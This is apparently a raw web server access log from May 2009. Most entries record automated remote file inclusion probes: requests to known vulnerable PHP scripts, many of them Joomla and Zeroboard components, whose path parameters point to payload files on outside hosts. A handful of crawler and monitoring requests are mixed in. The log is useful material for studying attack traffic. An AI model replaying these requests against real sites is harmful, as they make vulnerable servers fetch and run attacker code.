194.63.250.46 - - [31/May/2009:03:15:43 -0400] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://stormpages.com/ichy/fx29id.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
194.63.250.46 - - [31/May/2009:03:15:43 -0400] "GET /logs/access_log.Q109051100//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://stormpages.com/ichy/fx29id.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
194.63.250.46 - - [31/May/2009:03:15:43 -0400] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://stormpages.com/ichy/fx29id.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
194.63.250.46 - - [31/May/2009:03:16:02 -0400] "GET /logs/access_log.Q109051500//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://stormpages.com/ichy/fx29id.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
72.18.148.82 - - [31/May/2009:03:16:36 -0400] "GET /logs/access_log.Q109051600%20%20//citywriter/head.php?path=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
72.18.148.82 - - [31/May/2009:03:16:51 -0400] "GET /logs/access_log.Q109051700%20%20//citywriter/head.php?path=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
67.212.165.114 - - [31/May/2009:03:17:33 -0400] "GET //appserv/main.php?appserv_root=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id.txt???? HTTP/1.1" 404 215 "-" "libwww-perl/5.825"
67.212.165.114 - - [31/May/2009:03:17:33 -0400] "GET /logs/access_log.Q109051800//appserv/main.php?appserv_root=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id.txt???? HTTP/1.1" 404 242 "-" "libwww-perl/5.825"
67.212.165.114 - - [31/May/2009:03:17:33 -0400] "GET /logs//appserv/main.php?appserv_root=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id.txt???? HTTP/1.1" 404 220 "-" "libwww-perl/5.825"
207.44.232.81 - - [31/May/2009:03:17:57 -0400] "GET //skin/zero_vote/ask_password.php?dir=http://striderrider.com/plugins/system/legacy/simple.jpg? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
207.44.232.81 - - [31/May/2009:03:17:57 -0400] "GET /logs//skin/zero_vote/ask_password.php?dir=http://striderrider.com/plugins/system/legacy/simple.jpg? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
67.212.165.114 - - [31/May/2009:03:18:22 -0400] "GET /logs/access_log.Q109052300//appserv/main.php?appserv_root=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id.txt???? HTTP/1.1" 404 242 "-" "libwww-perl/5.825"
207.44.232.81 - - [31/May/2009:03:18:31 -0400] "GET //skin/zero_vote/ask_password.php?dir=http://striderrider.com/plugins/system/legacy/simple.jpg? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
207.44.232.81 - - [31/May/2009:03:18:31 -0400] "GET /logs//skin/zero_vote/ask_password.php?dir=http://striderrider.com/plugins/system/legacy/simple.jpg? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
209.59.12.99 - - [31/May/2009:03:18:35 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
203.22.204.193 - - [31/May/2009:03:20:39 -0400] "GET /logs/access_log.Q109051100//include/bbs.lib.inc.php?site_path=http://www.gayawater.co.kr/technote/..../id.txt??? HTTP/1.1" 404 249 "-" "libwww-perl/5.76"
203.22.204.193 - - [31/May/2009:03:20:40 -0400] "GET //include/bbs.lib.inc.php?site_path=http://www.gayawater.co.kr/technote/..../id.txt??? HTTP/1.1" 404 222 "-" "libwww-perl/5.76"
203.22.204.193 - - [31/May/2009:03:20:40 -0400] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.gayawater.co.kr/technote/..../id.txt??? HTTP/1.1" 404 227 "-" "libwww-perl/5.76"
209.59.12.99 - - [31/May/2009:03:23:37 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
121.165.73.157 - - [31/May/2009:03:24:08 -0400] "GET /plugins/spamx/BlackList.Examine.class.php?_CONF[path]=http://www.promodelia.com/gefel.txt? HTTP/1.1" 404 239 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)"
121.165.73.157 - - [31/May/2009:03:24:08 -0400] "GET /logs/plugins/spamx/BlackList.Examine.class.php?_CONF[path]=http://www.promodelia.com/gefel.txt? HTTP/1.1" 404 244 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)"
121.165.73.157 - - [31/May/2009:03:24:08 -0400] "GET /logs/error_log.Q108091600/plugins/spamx/BlackList.Examine.class.php?_CONF[path]=http://www.promodelia.com/gefel.txt? HTTP/1.1" 404 265 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)"
121.165.73.157 - - [31/May/2009:03:24:23 -0400] "GET /logs/error_log.Q108122100/plugins/spamx/BlackList.Examine.class.php?_CONF[path]=http://www.promodelia.com/gefel.txt? HTTP/1.1" 404 265 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)"
203.194.204.129 - - [31/May/2009:03:26:49 -0400] "GET /administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
203.194.204.129 - - [31/May/2009:03:26:49 -0400] "GET /logs/administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
203.194.204.129 - - [31/May/2009:03:26:59 -0400] "GET /logs/access_log.Q109051700%20%20/administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 404 292 "-" "Mozilla/5.0"
218.234.23.44 - - [31/May/2009:03:26:59 -0400] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.depo.org.pk/images/21/ts?? HTTP/1.1" 200 453 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)"
203.22.204.193 - - [31/May/2009:03:27:32 -0400] "GET //include/bbs.lib.inc.php?site_path=http://www.gayawater.co.kr/technote/..../id.txt??? HTTP/1.1" 404 222 "-" "libwww-perl/5.76"
209.59.12.99 - - [31/May/2009:03:28:37 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
218.38.243.71 - - [31/May/2009:03:29:19 -0400] "GET /includes/ktedit/toolbar.php?dirDepth=http://210.110.97.14/~designpower/bbs///skin/zero_vote/1.txt???? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
74.6.8.108 - - [31/May/2009:03:29:34 -0400] "GET /logs/error_log.Q109013000 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
66.249.68.76 - - [31/May/2009:03:30:14 -0400] "GET /robots.txt HTTP/1.1" 404 208 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.68.76 - - [31/May/2009:03:30:14 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L200C18446E415300A4DD058+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
209.200.8.89 - - [31/May/2009:03:32:26 -0400] "GET //?sIncPath=http://www.triton-friendlyclub.com/2009/test.gif?? HTTP/1.1" 200 452 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)"
209.200.8.89 - - [31/May/2009:03:32:27 -0400] "GET /logs//?sIncPath=http://www.triton-friendlyclub.com/2009/test.gif?? HTTP/1.1" 200 3567 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)"
218.150.78.203 - - [31/May/2009:03:32:52 -0400] "GET //zb//skin/zero_vote/ask_password.php?dir=http://www.triton-friendlyclub.com/2009/v5id1.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
218.150.78.203 - - [31/May/2009:03:32:53 -0400] "GET /logs//zb//skin/zero_vote/ask_password.php?dir=http://www.triton-friendlyclub.com/2009/v5id1.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
218.150.78.203 - - [31/May/2009:03:32:53 -0400] "GET /logs/access_log.Q109051500//zb//skin/zero_vote/ask_password.php?dir=http://www.triton-friendlyclub.com/2009/v5id1.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
203.194.204.129 - - [31/May/2009:03:32:53 -0400] "GET /logs/index.php?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
203.194.204.129 - - [31/May/2009:03:32:53 -0400] "GET /index.php?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
203.194.204.129 - - [31/May/2009:03:32:53 -0400] "GET /logs/access_log.Q109050900/index.php?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
218.150.78.203 - - [31/May/2009:03:32:57 -0400] "GET //zb//skin/zero_vote/ask_password.php?dir=http://www.triton-friendlyclub.com/2009/v5id1.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
218.150.78.203 - - [31/May/2009:03:32:57 -0400] "GET /logs//zb//skin/zero_vote/ask_password.php?dir=http://www.triton-friendlyclub.com/2009/v5id1.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
218.150.78.203 - - [31/May/2009:03:32:57 -0400] "GET /logs/access_log.Q109051500//zb//skin/zero_vote/ask_password.php?dir=http://www.triton-friendlyclub.com/2009/v5id1.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
218.150.78.203 - - [31/May/2009:03:33:10 -0400] "GET /logs/access_log.Q109052100//zb//skin/zero_vote/ask_password.php?dir=http://www.triton-friendlyclub.com/2009/v5id1.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
203.194.204.129 - - [31/May/2009:03:33:11 -0400] "GET /logs/access_log.Q109051000/index.php?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
218.38.243.71 - - [31/May/2009:03:33:11 -0400] "GET /logs///?sourcedir=http://210.110.97.14/~designpower/bbs///skin/zero_vote/1.txt???? HTTP/1.1" 200 3568 "-" "Mozilla/5.0"
218.38.243.71 - - [31/May/2009:03:33:11 -0400] "GET ///?sourcedir=http://210.110.97.14/~designpower/bbs///skin/zero_vote/1.txt???? HTTP/1.1" 200 453 "-" "Mozilla/5.0"
203.194.204.129 - - [31/May/2009:03:33:12 -0400] "GET /index.php?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
203.194.204.129 - - [31/May/2009:03:33:12 -0400] "GET /logs/index.php?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
203.194.204.129 - - [31/May/2009:03:33:12 -0400] "GET /logs/access_log.Q109050900%20%20/index.php?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
218.150.78.203 - - [31/May/2009:03:33:16 -0400] "GET /logs/access_log.Q109052100//zb//skin/zero_vote/ask_password.php?dir=http://www.triton-friendlyclub.com/2009/v5id1.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
203.194.204.129 - - [31/May/2009:03:33:31 -0400] "GET /logs/access_log.Q109051000%20%20/index.php?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
209.59.12.99 - - [31/May/2009:03:33:36 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
194.63.250.46 - - [31/May/2009:03:33:40 -0400] "GET /admin.php?submit=submit&form_include_template=http://stormpages.com/ichy/fx29id.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
194.63.250.46 - - [31/May/2009:03:33:40 -0400] "GET /logs/admin.php?submit=submit&form_include_template=http://stormpages.com/ichy/fx29id.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
194.63.250.46 - - [31/May/2009:03:33:40 -0400] "GET /logs/error_log.Q109051900/admin.php?submit=submit&form_include_template=http://stormpages.com/ichy/fx29id.txt?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
194.63.250.46 - - [31/May/2009:03:33:41 -0400] "GET /admin.php?submit=submit&form_include_template=http://stormpages.com/ichy/fx29id.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
194.63.250.46 - - [31/May/2009:03:33:41 -0400] "GET /logs/admin.php?submit=submit&form_include_template=http://stormpages.com/ichy/fx29id.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
194.63.250.46 - - [31/May/2009:03:33:41 -0400] "GET /logs/error_log.Q109051900/admin.php?submit=submit&form_include_template=http://stormpages.com/ichy/fx29id.txt?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
66.199.250.194 - - [31/May/2009:03:34:19 -0400] "GET /logs/error_log.Q108102800/components/com_simpleboard/image_upload.php?sbp=http://www.prismed.net/loaded61a//images/788df887d87sd.txt?? HTTP/1.1" 404 267 "-" "libwww-perl/5.813"
66.199.250.194 - - [31/May/2009:03:34:19 -0400] "GET /components/com_simpleboard/image_upload.php?sbp=http://www.prismed.net/loaded61a//images/788df887d87sd.txt?? HTTP/1.1" 404 241 "-" "libwww-perl/5.813"
66.199.250.194 - - [31/May/2009:03:34:19 -0400] "GET /logs/components/com_simpleboard/image_upload.php?sbp=http://www.prismed.net/loaded61a//images/788df887d87sd.txt?? HTTP/1.1" 404 246 "-" "libwww-perl/5.813"
213.246.62.35 - - [31/May/2009:03:34:26 -0400] "GET //zb//skin/zero_vote/ask_password.php?dir=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
213.246.62.35 - - [31/May/2009:03:34:26 -0400] "GET /logs/access_log.Q109051500//zb//skin/zero_vote/ask_password.php?dir=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
213.246.62.35 - - [31/May/2009:03:34:26 -0400] "GET /logs//zb//skin/zero_vote/ask_password.php?dir=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
213.246.62.35 - - [31/May/2009:03:35:30 -0400] "GET /logs/access_log.Q109052100//zb//skin/zero_vote/ask_password.php?dir=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
203.194.204.129 - - [31/May/2009:03:35:37 -0400] "GET /index.php?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
203.194.204.129 - - [31/May/2009:03:35:37 -0400] "GET /logs/access_log.Q109050900/index.php?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
203.194.204.129 - - [31/May/2009:03:35:37 -0400] "GET /logs/index.php?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
74.6.8.108 - - [31/May/2009:03:35:46 -0400] "GET /images/tools/ HTTP/1.0" 200 3659 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
203.194.204.129 - - [31/May/2009:03:35:58 -0400] "GET /logs/access_log.Q109051000/index.php?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
218.150.78.203 - - [31/May/2009:03:36:05 -0400] "GET //zb//skin/zero_vote/ask_password.php?dir=http://www.triton-friendlyclub.com/2009/v5id1.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
218.150.78.203 - - [31/May/2009:03:36:05 -0400] "GET /logs//zb//skin/zero_vote/ask_password.php?dir=http://www.triton-friendlyclub.com/2009/v5id1.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
83.103.72.130 - - [31/May/2009:03:36:07 -0400] "GET /?sourcedir=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
83.103.72.130 - - [31/May/2009:03:36:07 -0400] "GET /logs/access_log.Q109052300/?sourcedir=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
83.103.72.130 - - [31/May/2009:03:36:07 -0400] "GET /logs/?sourcedir=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 200 3562 "-" "Mozilla/5.0"
218.150.78.203 - - [31/May/2009:03:36:13 -0400] "GET /logs/access_log.Q109051500%20%20//zb//skin/zero_vote/ask_password.php?dir=http://www.triton-friendlyclub.com/2009/v5id1.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
218.150.78.203 - - [31/May/2009:03:36:28 -0400] "GET //zboard//skin/zero_vote/ask_password.php?dir=http://www.triton-friendlyclub.com/2009/v5id1.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
218.150.78.203 - - [31/May/2009:03:36:28 -0400] "GET /logs/access_log.Q109051800//zboard//skin/zero_vote/ask_password.php?dir=http://www.triton-friendlyclub.com/2009/v5id1.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
218.150.78.203 - - [31/May/2009:03:36:28 -0400] "GET /logs//zboard//skin/zero_vote/ask_password.php?dir=http://www.triton-friendlyclub.com/2009/v5id1.txt?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
83.103.72.130 - - [31/May/2009:03:36:29 -0400] "GET /logs/access_log.Q109052100/?sourcedir=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
222.122.160.145 - - [31/May/2009:03:36:30 -0400] "GET /logs/access_log.Q109051800//?_zb_path=http://www.laneviera.com/include/id???? HTTP/1.1" 404 226 "-" "libwww-perl/5.805"
222.122.160.145 - - [31/May/2009:03:36:30 -0400] "GET //?_zb_path=http://www.laneviera.com/include/id???? HTTP/1.1" 200 452 "-" "libwww-perl/5.805"
222.122.160.145 - - [31/May/2009:03:36:30 -0400] "GET /logs//?_zb_path=http://www.laneviera.com/include/id???? HTTP/1.1" 200 3567 "-" "libwww-perl/5.805"
83.103.72.130 - - [31/May/2009:03:36:49 -0400] "GET /?sourcedir=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
83.103.72.130 - - [31/May/2009:03:36:49 -0400] "GET /logs/?sourcedir=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 200 3562 "-" "Mozilla/5.0"
218.150.78.203 - - [31/May/2009:03:36:50 -0400] "GET //zb//skin/zero_vote/ask_password.php?dir=http://www.triton-friendlyclub.com/2009/v5id1.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
218.150.78.203 - - [31/May/2009:03:36:50 -0400] "GET /logs//zb//skin/zero_vote/ask_password.php?dir=http://www.triton-friendlyclub.com/2009/v5id1.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
218.150.78.203 - - [31/May/2009:03:36:50 -0400] "GET /logs/access_log.Q109051500//zb//skin/zero_vote/ask_password.php?dir=http://www.triton-friendlyclub.com/2009/v5id1.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
85.18.117.101 - - [31/May/2009:03:37:06 -0400] "GET //search/**-screens-ppa-inc-functions.inc....php-sources-template.php/admin.php?include_path=http://h1353618.stratoserver.net/kampagnen/bildungsstreik2008/includes/id1.txt?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
85.18.117.101 - - [31/May/2009:03:37:06 -0400] "GET /logs//search/**-screens-ppa-inc-functions.inc....php-sources-template.php/admin.php?include_path=http://h1353618.stratoserver.net/kampagnen/bildungsstreik2008/includes/id1.txt?? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
85.18.117.101 - - [31/May/2009:03:37:06 -0400] "GET /logs/access_log.Q109052100//search/**-screens-ppa-inc-functions.inc....php-sources-template.php/admin.php?include_path=http://h1353618.stratoserver.net/kampagnen/bildungsstreik2008/includes/id1.txt?? HTTP/1.1" 404 303 "-" "Mozilla/5.0"
218.150.78.203 - - [31/May/2009:03:37:06 -0400] "GET /logs/access_log.Q109052100//zb//skin/zero_vote/ask_password.php?dir=http://www.triton-friendlyclub.com/2009/v5id1.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
116.36.213.166 - - [31/May/2009:03:37:24 -0400] "GET /logs/access_log.Q109052300///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
116.36.213.166 - - [31/May/2009:03:37:39 -0400] "GET /logs/access_log.Q109051800///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
218.150.78.203 - - [31/May/2009:03:38:01 -0400] "GET /logs/access_log.Q109052100//zboard//skin/zero_vote/ask_password.php?dir=http://www.triton-friendlyclub.com/2009/v5id1.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
85.18.117.101 - - [31/May/2009:03:38:26 -0400] "GET /logs//search/**-screens-ppa-inc-functions.inc....php-sources-template.php/admin.php?include_path=http://h1353618.stratoserver.net/kampagnen/bildungsstreik2008/includes/id1.txt?? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
85.18.117.101 - - [31/May/2009:03:38:26 -0400] "GET /logs/access_log.Q109052100//search/**-screens-ppa-inc-functions.inc....php-sources-template.php/admin.php?include_path=http://h1353618.stratoserver.net/kampagnen/bildungsstreik2008/includes/id1.txt?? HTTP/1.1" 404 303 "-" "Mozilla/5.0"
85.18.117.101 - - [31/May/2009:03:38:26 -0400] "GET //search/**-screens-ppa-inc-functions.inc....php-sources-template.php/admin.php?include_path=http://h1353618.stratoserver.net/kampagnen/bildungsstreik2008/includes/id1.txt?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
200.93.147.154 - - [31/May/2009:03:38:33 -0400] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.webfo.biz/unix/test.txt?? HTTP/1.1" 404 255 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
200.93.147.154 - - [31/May/2009:03:38:35 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.webfo.biz/unix/test.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
209.59.12.99 - - [31/May/2009:03:38:37 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
218.234.23.44 - - [31/May/2009:03:38:58 -0400] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.depo.org.pk/images/21/ts?? HTTP/1.1" 200 3568 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)"
222.122.160.145 - - [31/May/2009:03:39:36 -0400] "GET /logs/access_log.Q109052200//?_zb_path=http://www.laneviera.com/include/id???? HTTP/1.1" 404 226 "-" "libwww-perl/5.805"
85.18.117.101 - - [31/May/2009:03:39:46 -0400] "GET /logs/access_log.Q109050300//search/**-screens-ppa-inc-functions.inc....php-sources-template.php/admin.php?include_path=http://h1353618.stratoserver.net/kampagnen/bildungsstreik2008/includes/id1.txt?? HTTP/1.1" 404 303 "-" "Mozilla/5.0"
203.194.204.129 - - [31/May/2009:03:39:56 -0400] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
203.194.204.129 - - [31/May/2009:03:39:56 -0400] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
203.194.204.129 - - [31/May/2009:03:39:56 -0400] "GET /logs/access_log.Q109050900//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
38.99.13.118 - - [31/May/2009:03:39:49 -0400] "GET /logs/access_log.Q109052200 HTTP/1.0" 200 4757864 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
203.194.204.129 - - [31/May/2009:03:40:13 -0400] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
203.194.204.129 - - [31/May/2009:03:40:13 -0400] "GET /logs/access_log.Q109050900%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
203.194.204.129 - - [31/May/2009:03:40:13 -0400] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
203.194.204.129 - - [31/May/2009:03:40:21 -0400] "GET /logs/access_log.Q109051000//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
203.194.204.129 - - [31/May/2009:03:40:30 -0400] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
203.194.204.129 - - [31/May/2009:03:40:30 -0400] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
203.194.204.129 - - [31/May/2009:03:40:30 -0400] "GET /logs/access_log.Q109050900//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
203.194.204.129 - - [31/May/2009:03:40:31 -0400] "GET /logs/access_log.Q109051000%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
218.246.20.221 - - [31/May/2009:03:40:42 -0400] "GET /logs/access_log.Q109052300/index.php?arquivo=http://tkc21.co.kr/bbs/security/online/id1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
203.194.204.129 - - [31/May/2009:03:40:54 -0400] "GET /logs/access_log.Q109051000//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
218.38.243.71 - - [31/May/2009:03:41:12 -0400] "GET /logs//?sourcedir=http://210.110.97.14/~designpower/bbs///skin/zero_vote/1.txt???? HTTP/1.1" 200 3567 "-" "Mozilla/5.0"
218.38.243.71 - - [31/May/2009:03:41:13 -0400] "GET //?sourcedir=http://210.110.97.14/~designpower/bbs///skin/zero_vote/1.txt???? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
69.50.197.106 - - [31/May/2009:03:41:45 -0400] "GET /index2.php?ID=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
69.50.197.106 - - [31/May/2009:03:41:45 -0400] "GET /logs/index2.php?ID=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
69.50.197.106 - - [31/May/2009:03:41:45 -0400] "GET /logs/index2.php?ID=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
69.50.197.106 - - [31/May/2009:03:41:45 -0400] "GET /index2.php?ID=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
218.249.36.194 - - [31/May/2009:03:43:10 -0400] "GET /logs//search/**-screens-ppa-inc-functions.inc....php-sources-template.php/admin.php?include_path=http://jamur-x.do.am/id1.txt??????? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
218.249.36.194 - - [31/May/2009:03:43:10 -0400] "GET /logs/access_log.Q109052100//search/**-screens-ppa-inc-functions.inc....php-sources-template.php/admin.php?include_path=http://jamur-x.do.am/id1.txt??????? HTTP/1.1" 404 303 "-" "Mozilla/5.0"
